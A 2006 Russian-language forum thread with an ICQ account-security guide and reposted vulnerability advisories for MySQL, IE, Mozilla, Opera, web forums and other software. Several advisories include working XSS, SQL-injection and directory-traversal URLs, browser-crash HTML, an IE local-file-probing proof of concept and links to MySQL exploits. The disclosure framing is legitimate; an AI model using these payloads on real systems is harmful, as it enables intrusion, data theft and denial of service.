Программы - НАШ ФОРУМ
[ Новые сообщения · Участники · Правила форума · Поиск ]
Friend: Rus-Hip-Hop.

Вы вошли как Гость

Текущая дата: Четверг, 2024.04.18, 23:14:18
Темный
Светлый (редактируем)
Голубой (редактируем)
Розобый (редактируем)
  • Страница 1 из 2
  • 1
  • 2
  • »
НАШ ФОРУМ » Информационные и программные ресурсы » Вирусы и безопасность » Программы (И их слабые места...)
Программы
BattleДата: Четверг, 2006.02.16, 00:44:23 | Сообщение # 1
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
ПРИВЕСТВУЮ ВАС

Тут будет информация о дырах в программах и как их заделать.


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 00:45:22 | Сообщение # 2
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Защитим тетю Асю!

Многие из нас привыкли при входе в Интернет сразу же запускать ICQ. Да уж, эта программа прижилась у нас и вне конкуренции с остальными. Впрочем, большой популярностью она пользуется не только у обычных пользователей Интернета, но и у различных взломщиков, которые не хотят иметь номер 243756712, а им подавай 110011.
Иногда кажется, что защититься от взломщика невозможно, но как тогда пользуются ICQ сами взломщики уинов и причем довольно долго удерживают при себе солидные шестизначные номера?
Для начала скачайте последнюю версию программы, вам нужно пользоваться стабильной последней версией ICQ, а не какой-то дырявой ICQ 99'alpha.
Сейчас распространенным способом взлома стал подбор паролей по словарю. То есть из Интернета скачивается словарик с популярными, легкими и примитивными паролями (что-то вроде 123456 или password), затем берется программа, которая будет пароли пробовать подставлять (не вручную же это делать). Как вы понимаете, эту несложную процедуру может провести и первоклассник, который умеет пользоваться Интернетом. Многие из нас по каким-либо причинам придумывают элементарно легкие пароли. Это либо их ник, имя или фамилия, их логин, который является первой частью их e-mail'а, либо какое-то слово, которое можно найти в информации о пользователе. Если вы не в состоянии придумать себе пароль, то воспользуйтесь генератором паролей, а если вы все-таки решили делать это сами, то помните, что его длина должна быть как минимум 7 символов.
Еще один распространенный метод получения вашего пассворда — сослаться на то, что вы его якобы забыли и указать e-mail, на который вам его надо отправить. Если вы используете не платный ящик, а какой-либо бесплатный вроде mail.ru, yandex.ru, hotmail.com или им подобные, то вам есть чего бояться. Взломать его не так сложно, как вам кажется, ведь на бесплатных почтовых серверах достаточно много дыр, кроме того, вы должны быть уверены в надежности своего пароля, так как к нему также можно применить метод перебора. Многие пользователи любят указывать почтовый ящик на несуществующих серверах. Примером могут служить адреса типа sssss@zzzzzzz.com. Но если вашим номером кто-то сильно заинтересуется, то ничто ему не помешает за небольшую сумму купить доме www.zzzzzzz.com и, когда он будет задействован, получить письмо с паролем.
Решение проблемы простое — создайте e-mail, который будет существовать специально для ICQ. Советую не говорить о его существовании не только никому из врагов, но и друзей. Например, создайте почту icq_password@yandex.ru и в настройках вашего ICQ-клиента укажите этот e-mail для отправки паролей. Взломщик не сможет узнать e-mail, а соотвественно, не узнает, на какой адрес отправляются пароли.
Очень важная настройка в ICQ — это отключение автосохранения пароля. Если вход в Аську происходит автоматически, то пароль откуда-то считывается, то есть где-то сохранен. Если ICQ проинсталлирована в каталог по умолчанию, то путь к вашим паролям такой: C:\Program Files\icq\db, а имена файлов: номер_icq.dat и номер_icq.idx. Как вы понимаете, если взломщик получит эти файлы, то можете считать, что у него уже есть ваш пароль. Самое обидное, что даже не понадобится много знаний для расшифровки пароля, для этого уже существует десяток программ. Если вы думаете, что вас спасет то, что ICQ установлена в директорию, отличную от стандартной, то вы ошибаетесь. Во-первых, во время вашего отсутствия к вам может зайти кто-то и скопировать эти файлы на дискету. Во-вторых, путь к ICQ лежит в реестре, так что если программа грамотно написана, то отошлет эти файлы с любого места, куда бы вы ее ни установили. Если вы уже пользуетесь автосохранением пароля, то вам надо вызвать меню кнопки Main и выбрать пункт Security&Privacy. Сначала выберите Permission level как Custom, а затем выделите Password и уберите галочку с пункта Remember password (или Save password).
Но даже если вы не используете автосохранение, это не гарантия безопасности пароля, так как существуют такие программы, как кейлогеры, задача которых записывать все нажатые пользователем клавиши. После того как у вас заведется keyloger все нажатия клавиш будут фиксироваться, в том числе и пароль, который вы вводите для входа в ICQ, а затем отсылаться злоумышленнику. Единственный выход, который я вижу, — это не запускать подозрительных программ, а также установить себе firewall, который будет предупреждать о попытках программы выйти в Интернет (для отсылки паролей хозяину).
Есть еще одна проблема, которая хоть и не отберет у вас пароль, но заставит отказаться от своего uin'а добровольно — это icq-флудеры. Программы для icq-спама появились уже довольно давно, и теперь каждый сможет скачать ее себе, а она в свою очередь будет бомбить указанный адрес разными сообщениями или рекламой. Все это не только надоедает, но и жутко тормозит серфинг по Интернету, забивая весь трафик сообщениями, на слабых компьютерах это может даже привести к зависанию. Поверьте, и недели не пройдет, как вы забросите свой любимый номер и создадите себе новый.
Но выход, как всегда, есть, зайдите в уже знакомую настройку безопасности Main > Security&Privacy. Если бомбежка вашего номера производится с одного или нескольких номеров, то вы можете внести их в черный список, другими словами, их сообщения приниматься не будут. Выберите Ignore List и нажмите кнопку Add to Ignore list, затем введите номера злоумышленников и будьте уверены, что от них уже звука не будет.
Но увы, не все так просто, ведь многие программы генерируют ICQ-номера отправителя, и каждое сообщение приходит от нового номера, а добавлять каждый номер не только глупо, но и бесполезно. Для решения этой проблемы перейдите в раздел General, и вы увидите сверху два пункта: первый гласит, что вам могут отсылать сообщения все пользователи, а второй, что делать это могут только те, кто находится у вас в Contact list. Поставьте галочку напротив второго пункта ( My authorization is required before users add me to their Contact List).
Заключение
Вот вроде бы и все методы защиты, о которых я хотел вам рассказать и которыми, конечно же, пользуюсь и я сам. Посему если вам действительно дорог ваш номер, то вы должны придерживаться всех данных здесь советов и, кроме этого, качать все обновления вашего ICQ-клиента.
Удачно вам отбиться от охотников за уинами!


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 00:46:01 | Сообщение # 3
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Множественные уязвимости в MySQL


Программа: MySQL версии до 4.0.24 и 4.1.10a
Опасность: Низкая

Наличие эксплоита: Да

Описание:
Обнаруженные уязвимости позволяют локальному пользователю получить поднятые привилегии в базе данных, удаленному авторизованному пользователю выполнить произвольный код на системе с привилегиями mysqld процесса.

1. Уязвимость существует при использовании временных файлов в функции CREATE TEMPORARY TABLE. Локальный пользователь может создать символическую ссылку с другого файла базы данных на временный файл. Подключиться к MySQL с помощью клиента и создать временную таблицу, которая будет использовать символическую ссылку вместо обычного временного файла. Таким образом, локальный пользователь может повысить свои привилегии в пределах базы данных.

2. Уязвимость существует в функции udf_init() файла 'sql_udf.cc' из-за некорректной обработки имен директорий. Авторизованный пользователь с привилегиями INSERT и DELETE в административной базе данных ‘mysql’ может вставить специально сформированное значение в поле dl таблицы mysql.func и указать расположение специально сформированной библиотеки, которая затем будет выполнена базой данных.

3. Уязвимость существует при использовании команды CREATE FUNCTION. Авторизованный пользователь с привилегиями INSERT и DELETE в административной базе данных ‘mysql’ может использовать команду CREATE FUNCTION в некоторых libc функциях (strcat, on_exit, exit и т.д.) чтобы выполнить произвольный код на системе с привилегиями mysqld процесса.

Пример/Эксплоит: http://www.securitylab.ru/53240.html

URL производителя: http://www.mysql.com

Решение: Установите обновления от производителя.


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 00:46:30 | Сообщение # 4
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Переполнение буфера в различных диссекторах в Ethereal


Программа: Ethereal 0.9.1 - 0.10.9
Опасность: Средняя

Наличие эксплоита: Да

Описание:
Уязвимости позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на уязвимой системе.

Несколько переполнений буфера обнаружены в диссекторах Etheric, GPRS-LLC, 3GPP2 A11, IAPP, JXTA и sFlow. Удаленный пользователь может вызвать отказ в обслуживании или выполнить произвольный код на уязвимой системе.

Пример/Эксплоит:
http://www.securitylab.ru/53246.html

URL производителя: http://www.ethereal.com

Решение: Установите последнюю версию (0.10.10) от производителя.


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 00:46:52 | Сообщение # 5
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
SQL-инъекция и межсайтовый скриптинг в ProjectBB


Программа: ProjectBB 0.4.5.1
Опасность: Средняя

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю произвести XSS нападение и выполнить произвольные SQL команды в базе данных уязвимого приложения.

1. Уязвимость существует из-за некорректной фильтрации данных в параметре pages сценария drivers.php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы. Пример:

http://[target]/Zip/divers.php?action=liste&liste=&desc=&pages=[XSS]

2. Удаленный пользователь может произвести SQL-инъекцию из-з анекорректной фильтрации данных в параметрах desc и liste в сценарии drivers.php. Пример: http://[target]/Zip/divers.php?action=liste&liste=[SQL CODE]
http://[target]/Zip/divers.php?action =liste&liste=email&desc=[SQL CODE]&pages=1

URL производителя: http://projectbb.free.fr

Решение: Способов устранения уязвимости не существует в настоящее время.


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 00:47:34 | Сообщение # 6
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Отказ в обслуживании в Message Queue в HP Tru64 UNIX

Программа: HP Tru64 Unix V5.1B-2/PK4, V5.1B-1/PK3, V5.1A PK6, V4.0G PK4, V4.0F PK8
Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет локальному пользователю вызвать отказ в обслуживании системы.

Уязвимость обнаружена при обработке очередей сообщений в HP Tru64 UNIX. Локальный пользователь может с помощью приложений, использующий Message Queue вызвать отказ в облуживании системы. Уязвимыми приложениями являются nfsstat, pfstat, arp, ogated, rarpd, route, sendmail, srconfig, strsetup, trpt, netstat, и xntpd.

URL производителя: http://www.hp.com

Решение: Установите обновления от производителя.


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 00:48:57 | Сообщение # 7
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Mysql 4.x "CREATE FUNCTION" libc Arbitrary Code Execution Exploit

Цель эксплоита: Mysql <= 4.0.23, 4.1.10
Воздействие эксплоита: Выполнение произвольного кода

Описание уязвимости: Нет

Скачать эксплоит: http://www.securitylab.ru/_Exploits/2005/03/mysqllib.pl.txt


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 00:49:23 | Сообщение # 8
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Mysql 4.x "CREATE FUNCTION" Arbitrary library injection Exploit


Цель эксплоита: Mysql 4.x
Воздействие эксплоита: Local/Remote Privileges Escalation

Описание уязвимости: Нет

Скачать эксплоит: http://www.securitylab.ru/_Exploits/2005/03/mysqlcreate.pl.txt


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 01:01:55 | Сообщение # 9
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Переполнение буфера в Ipswitch IMail Server


Программа: Ipswitch IMail Server 8.15 и более ранние версии
Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному авторизованному пользователю выполнить произвольный код с административными привилегиями на системе.

Уязвимость существует в службе IMAP при обработке входных данных в команде IMAP EXAMINE. Удаленный авторизованный пользователь может указать в качестве параметра команды EXAMINE специально сформированное имя почтового ящика длиной 259 байт, вызвать переполнение буфера и выполнить произвольный код на системе.

URL производителя: http://ipswitch.com

Решение: Установите исправление от производителя
ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/IM815HF1.exe


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 01:02:23 | Сообщение # 10
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Межсайтовый скриптинг в YaBB


Программа: YaBB2 RC1
Опасность: Низкая

Наличие эксплоита: Да

Описание:
Обнаруженная уязвимость позволяет злоумышленнику произвести XSS нападение и получить доступ к важным данным пользователей.

Уязвимость существует из-за некорректной фильтрации входных данных в параметре username. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы. Пример:

http://[target]/YaBB.pl?action=usersrecentposts;username=
<IFR AME%20SRC%3Djavascript:alert('XSS-Vulnerability')
> <%252FIFRAME>

URL производителя: http://www.yabbforum.com

Решение: Способов устранения уязвимости не существует в настоящее время.


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 01:03:18 | Сообщение # 11
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Раскрытие важной информации в aeNovo


Программа: aeNovo
Опасность: Средняя

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю получить доступ файлу базы данных приложения.

Удаленный пользователь может с помощью специально сформированного URL скачать файл базы данных приложения 'dbase/aeNovo1.mdb'.

URL производителя: http://www.aenovo.com

Решение: Способов устранения уязвимости не существует в настоящее время.


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 01:03:40 | Сообщение # 12
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Межсайтовый скриптинг в Phorum

Программа: Phorum 5.0.14 и более ранние версии
Опасность: Низкая

Наличие эксплоита: Да

Описание:
Обнаруженные уязвимости позволяют злоумышленнику произвести XSS нападение и потенциально получить важные данные пользователей.

Межсайтовый скриптинг существует из-за некорректной фильтрации входных данных в имени загружаемого файла в сценарии 'file.php', в теме сообщения в сценарии 'follow.php' и в панели управления пользователями. Удаленный пользователь может выполнить произвольный HTML сценарий в браузере жертвы.

Пример/Эксплоит: См. источник сообщения.

URL производителя: http://www.phorum.org

Решение: Установите последнюю версию от производителя.


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 01:04:00 | Сообщение # 13
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Изменение файлов в Vote Module в HolaCMS


Программа: HolaCMS 1.4.9
Опасность: Средняя

Наличие эксплоита: Да

Описание:
Уязвимость позволяет удаленному пользователю перезаписать файлы на целевой системе.

Уязвимость существует из-за некорректной фильтрации входных данных в переменой 'vote_filename'. Удаленный пользователь может указать в качестве параметра уязвимой переменой произвольный файл на сервере и перезаписать его с привилегиями web сервера.

URL производителя: http://www.holacms.de

Решение: Способов устранения уязвимости не существует в настоящее время.


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 01:04:28 | Сообщение # 14
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Выполнение произвольного кода в rxvt-unicode


Программа: rxvt-unicode версии до 5.3
Опасность: Средняя

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет злоумышленнику выполнить произвольный код на целевой системе.

Переполнение буфера существует в сценарии command.c из-за некорректной фильтрации входных данных. Злоумышленник может послать приложению длинную последовательность байт, переполнить буфер и выполнить произвольный код.

URL производителя: http://software.schmorp.de

Решение: Установите обновление от производителя.


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 01:05:06 | Сообщение # 15
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Небезопасное создание временных файлов в Wine

Программа: Wine 20050211 и более ранние версии
Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет локальному пользователю прочитать некоторые значения ключей системного реестра.

Приложение сохраняет временную копию некоторых ключей реестра во временных файлах, которые доступны всем по умолчанию. Локальный пользователь может получить доступ к потенциально важной системной информации.

URL производителя: http://winehq.org

Решение: Способов устранения уязвимости не существует в настоящее время.


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 01:09:25 | Сообщение # 16
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Раскрытие информации при обработке XML сценариев в Adobe Acrobat

Программа: Adobe Acrobat 7.0, 7.0.1
Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Уязвимость позволяет удаленному пользователю определить наличие целевого файла на системе.

Удаленный пользователь может создать специальным образом PDF файл и включить в него XML сценарий и Javascript и определить наличие определенного файла не целевой системе.

URL производителя: www.adobe.com

Решение: Установите обновление версию с сайта производителя.


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 02:08:40 | Сообщение # 17
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Раскрытие информации в Microsoft IE

Программа: Microsoft Internet Explorer 6.00.2800
Опасность: Низкая

Наличие эксплоита: Да

Описание:
Уязвимость обнаружена в Microsoft IE. Удаленный атакующий может определить наличие произвольного файла на уязвимой системе.

Удаленный атакующий может создать специальным образом сценарий, который способен определить наличие файлов в директориях WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND, Internet Explorer, и c:\.

URL производителя: www.microsoft.com

Решение: Решение не существует на данный момент.


Microsoft Internet Explorer permits to examine the existence of local files


Description:
There is a security bug in Microsoft Internet Explorer, which allows to
check up existence of local files in system directories (Root (C:/),
WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND, Internet Explorer).
Successful exploitation allows the author of a malicious web site to plan
attacks against the target computer.
The bug occurs, because Microsoft Internet Explorer does not open a window,
if the target file exists; but it will open a window, if the file does not
exist.
Also an attacker can use this "feature" to verify existence of local files
(e.g. system files, malware files, shortcuts on Desktop, ...).

Affected software:
Microsoft Internet Explorer

Workaround:
Deactivate "Active Scripting" in the IE options menu.

Proof-of-Concept exploit:

<textarea id="btft" rows="10" cols="75"></textarea><br>
<input type="text" id="btfn" value="iexplore.exe">
<input type="button" value="> Search >"
onClick="alert('File '+btfc(document.all.btfn.value));">

<script>

// Copyright © 2004 by Benjamin Tobias Franz (0-1-2-3@gmx.de)
//
// Search for files with known names in following directories:
// Root (C:/), WINDOWS, SYSTEM, SYSTEM32, DESKTOP, COMMAND,
// Internet Explorer

function btfc(btfp){
var btfe=0,btfp;
try{window.open("res://"+btfp,"_search";}
catch(e){btfe=1;}
if(btfe==1)return "'"+btfp+"' exists!\n";
else return "'"+btfp+"' does NOT exist!\n";}

var btfd="",btfv="BTF-AntiVirus: Search for '";
btfd+="Search for system files ...\n";
btfd+=btfc("autoexec.bat";
btfd+=btfc("msdos.sys";
btfd+=btfc("twain.dll";
btfd+=btfc("swflash.ocx";
btfd+=btfc("shell32.dll";
btfd+=btfc("test.txt";
btfd+=btfc("test.btf";
btfd+="\nSearch for shortcut files (on desktop) ...\n";
btfd+=btfc("Microsoft Word.lnk";
btfd+=btfc("IrfanView.lnk";
btfd+=btfc("Opera.lnk";
btfd+=btfc("Mozilla.lnk";
btfd+=btfc("Netscape 6.lnk";
btfd+=btfc("Netscape 7.lnk";
btfd+=btfc("btf.lnk";
btfd+="\nSearch for virus/worm files ...\n";
btfd+=btfv+"Badtrans' : "+btfc("kernel32.exe";
btfd+=btfv+"MTX' : "+btfc("wsock32.mtx";
btfd+=btfv+"MyLife.j' : "+btfc("usa.scr";
btfd+=btfv+"MyLife.f' : "+btfc("list480.txt.scr";
btfd+=btfv+"MyLife.c' : "+btfc("list.txt.scr";
btfd+=btfv+"MyLife.b' : "+btfc("cari.scr";
btfd+=btfv+"MyLife.a' : "+btfc("my life.scr";
btfd+=btfv+"Gibe' : "+btfc("bctool.exe ";
btfd+=btfv+"Klez' : "+btfc("wqk.exe";
btfd+=btfv+"MyParty' : "+btfc("regctrl.exe";
btfd+=btfv+"Maldal' : "+btfc("win.exe";
btfd+=btfv+"Gokar' : "+btfc("karen.exe";

// ...

document.all.btft.value=
"Copyright © 2004 by Benjamin Tobias Franz (0-1-2-3@gmx.de)\n\n"+
btfd;
</script>


Date of discovery:
06. November 2004


Tested in Microsoft Internet Explorer 6 SP1 (6.0.2800.1106) with all
patches installed on Windows 98.


My DLL versions:

MSHTML.DLL: 6.00.2800.1477
BROWSEUI.DLL: 6.00.2800.1596 (xpsp2.040919-1003)
SHDOCVW.DLL: 6.00.2800.1596 (xpsp2.040919-1003)
SHLWAPI.DLL: 6.00.2800.1584 (xpsp2.040720-1705)
URLMON.DLL: 6.00.2800.1475
WININET.DLL: 6.00.2800.1475


Regards,
Benjamin Tobias Franz
Germany


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 02:09:28 | Сообщение # 18
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Межсайтовое выполнение сценариев в MailPost

Программа: MailPost 5.1.1sv
Опасность: Низкая

Наличие эксплоита: Да

Описание:
Обнаружено несколько уязвимостей в MailPost. Удаленный атакующий может выполнить межсайтовый скриптинг и получить доступ к важной информации на системе.

Удаленный атакующий может определить наличие определенного файла на системе с помощью специально сформированного URL:

http://[target]/scripts....em.ini?
*nosend*=&email=test@procheckup.com

Если приложение запущена в режиме отладки, удаленный атакующий с помощью специального URL может получить информацию об установочной директории приложения на сервере, а также версию продукта:

http://[target]/scripts/mailpost.exe?*debug*=''

Удаленный атакующий может выполнить межсайтовый скриптинг, если приложение запущено в режиме отладки. Уязвимость существует из-за некорректной обработки переменой 'append'. Пример:

http://[target]/scripts/mailpost.exe?*debug*=''&append=<script>alert('Can%20Cross%20Site%20Script' )</script>

Подобная уязвимость существует при добавлении слеша к имени файла. Пример:

http://[target]/scripts/mailpost.exe/<scrip t>alert('hi')</script>/mail.txt

URL производителя: www.mcenter.com/mailpost

Решение: Решение не существует на данный момент.


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 02:10:13 | Сообщение # 19
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Раскрытие информации в Forum Web Server

Программа: Forum Web Server 1.6, 2.0 Power Pack (current)
Опасность: Средняя

Наличие эксплоита: Да

Описание:
Обнаружено несколько уязвимостей в Forum Web Server. Удаленный атакующий может получить доступ к важным данным на системе.

Удаленный атакующий может с помощью специально сформированного HTTP запроса, содержащего символы перехода между каталогами ('../' или '..\'), получить доступ на чтение произвольных файлов на системе за пределами корневого каталога web сервера. Пример:

http://[target]/..\..\..\file.ext
htt p://[target]/../../../file.ext
http://[target]/%2E%2E%5C%2E%2E%5C%2E%2E%5Cfile.ext
http://[target]/%2E%2E%2F%2E%2E%2F%2E%2E%2Ffile.ext

Сервер хранит пароли и имена пользователей в файле 'username.ini' в обычном виде. Удаленный атакующий с помощью предыдущей уязвимости может получить доступ к файлу паролей.

URL производителя: www.minihttpserver.net/bbs/

Решение: Решение не существует на данный момент.


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 02:14:56 | Сообщение # 20
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Целочисленное переполнение в Apple QuickTime

Программа: Apple QuickTime версии до 5.6.2
Опасность: Высокая

Наличие эксплоита: Нет

Описание:
Обнаружено переполнение буфера в Apple QuickTime. Удаленный атакующий может выполнить произвольный код на уязвимой системе с правами текущего пользователя.

Удаленный атакующий может создать специально сформированный HTML код, который при загрузке страницы целевым пользователем, приведет к целочисленному переполнению.

URL производителя: www.apple.com/quicktime/

Решение: Установите обновление www.apple.com/quicktime/download/


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 02:15:28 | Сообщение # 21
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Уязвимость форматной строки в WindowMaker

Программа: WindowMaker версии до 0.90
Опасность: Низкая

Наличие эксплоита: Нет

Описание:
Обнаружена уязвимость в WMGLOBAL в приложении WindowMaker. Удаленный атакующий ожжет скомпрометировать уязвимую систему.

URL производителя: www.windowmaker.org

Решение: Установите обновление
ftp://windowmaker.org/pub/source/release/WindowMaker-0.90.0.tar.gz


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 02:15:51 | Сообщение # 22
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Подмена URL в NetCaptor и Slim Browser

Программа: NetCaptor 7.5.2, Slim Browser 4.х
Опасность: Низкая

Наличие эксплоита: Да

Описание:
Обнаружена подмена URL в браузерах NetCaptor и Slim Browser. Удаленный атакующий может получить доступ к важной информации на системе. Примеры:

http://secunia.com/multiple_browsers_dialog_box_spoofing_test/

http://secunia.com/multiple_browsers_form_field_focus_test/

Решение: Решение на данный момент не существует


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 02:17:16 | Сообщение # 23
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Отказ в обслуживании в Mozilla

Программа: Mozilla
Опасность: Средняя

Наличие эксплоита: Да

Описание:
Обнаружена уязвимость в браузере Mozilla. Удаленный атакующий может вызвать отказ в обслуживании программы.

Уязвимость существует из-за некорректной обработки некоторых тегов. Удаленный атакующий может с помощью злонамеренного HTML кода аварийно завершить работу браузера. Примеры:

Пример 1:

<HTML><INPUT AAAAAAAAAA>


Пример 2:

<HTML>
< HEAD>
< MARQUEE>
< TABLE>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< MARQUEE HEIGHT=100000000>
< TBODY>
Attack of the marquees!


Пример 3:

<HTML>
< HEAD>
< TABLE>
< APPLET>
< MAP>
< COL SPAN=900000000>

URL производителя: www.mozilla.org

Решение: Решение на данный момент не существует


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 02:17:38 | Сообщение # 24
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Отказ в обслуживании в Opera

Программа: Opera
Опасность: Средняя

Наличие эксплоита: Да

Описание:
Обнаружена уязвимость в браузере Opera. Удаленный атакующий может вызвать отказ в обслуживании программы.

Уязвимость существует из-за некорректной обработки некоторых тегов. Удаленный атакующий может с помощью злонамеренного HTML кода аварийно завершить работу браузера. Пример:

<HTML>
< TBODY>
< COL SPAN=999999999>

URL производителя: http://www.opera.com

Решение: Решение на данный момент не существует


Настали суровые времена.
Связь: LEONeso@gmail.com
 
BattleДата: Четверг, 2006.02.16, 02:17:58 | Сообщение # 25
Та все норм.
Группа: Администраторы
Сообщений: 864
Репутация: 2
Статус: Offline
Выполнение произвольного кода в Microsoft IE

Программа: Microsoft Internet Explorer 6.0 SP 2
Опасность: Высокая

Наличие эксплоита: Да

Описание:
Обнаружена уязвимость в Microsoft Internet Explorer при обработке события AnchorClick. Удаленный атакующий может с помощью специально сформированной HTML страницы выполнить произвольный код в контексте зоны безопасности локального компьютера.

Удаленный атакующий может создать HTML код, содержащий событие AnchorClick (для того, чтобы отрыть произвольную директорию на целевой системе используя объект ActiveX Shell.Explorer), и специально сформированное изображение, которое при попытке перетащить его в предыдущее окно, будет сохранено в текущей директории.

Поскольку только файлы определенных типов могут быть сохранены таким образом, специально сформированное изображение должно эмулировать один из следующий форматов: .xml', '.doc', '.py', '.cdf', '.css', '.pdf', '.ppt' и т.д.

Затем HTML может вызвать приложение HTML Help (hh.exe) с некорректным окном для того чтобы отобразить рисунок, который собственно является HTML сценарием. HTML сценарий может прочитать произвольный внешний текстовый файл и сохранить его в формате .hta на целевой системе.

URL производителя: www.microsoft.com

Решение: Решение на данный момент не существует. В качестве временного решения возможно установить Kill бит для объекта Shell.Explorer:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{8856F961-340A-11D0-A96B-00C04FD705A 2}]
"Compatibility Flags"=dword:00000400


Настали суровые времена.
Связь: LEONeso@gmail.com
 
НАШ ФОРУМ » Информационные и программные ресурсы » Вирусы и безопасность » Программы (И их слабые места...)
  • Страница 1 из 2
  • 1
  • 2
  • »
Поиск:
Используются технологии uCoz
Rambler's Top100